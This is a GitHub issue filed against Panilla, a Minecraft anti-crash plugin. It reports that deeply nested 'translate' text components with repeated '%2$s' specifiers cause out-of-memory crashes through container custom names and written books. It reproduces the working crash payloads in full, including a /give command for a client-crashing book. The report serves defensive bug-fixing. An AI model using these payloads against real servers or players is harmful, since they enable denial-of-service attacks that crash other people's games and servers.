search

ds58 / Panilla

Prevent abusive NBT and crash packets on a Minecraft server
MIT License
149 stars 40 forks source link

Crash method with translations when opening containers (server crash) or books (client crash) #142

Open Zailer43 opened 6 months ago

Zailer43 commented 6 months ago

Details

The following NBT of a container can cause a java.lang.OutOfMemoryError: Java heap space. Therefore, this is prevented in the Name of the items on display, but it is not checked in the CustomName of the BlockEntityTag.

https://github.com/ds58/Panilla/blob/c384c90832977799dbdefa46fe9f72e4a91d0f30/api/src/main/java/com/ruinscraft/panilla/api/nbt/checks/NbtCheck_display.java#L35-L78

Edit: I was testing, and currently, Panilla doesn't fix it in books either, only in the item name

NBT

{BlockEntityTag: {CustomName: '[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["","overwritelox"]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]'}}
{BlockEntityTag: {CustomName: "[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",[{\"translate\":\"%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s%2$s\",\"with\":[\"\",\"overwritelox\"]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]"}}

Edit: Book

/give @s minecraft:written_book{pages:['[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["",[{"t\\u0072a\\u006es\\u006ca\\u0074e":"%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073%\\u0032$\\u0073","w\\u0069t\\u0068":["","overwritelox"]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]]}]'],title:"haha funny book", author:"Notch"}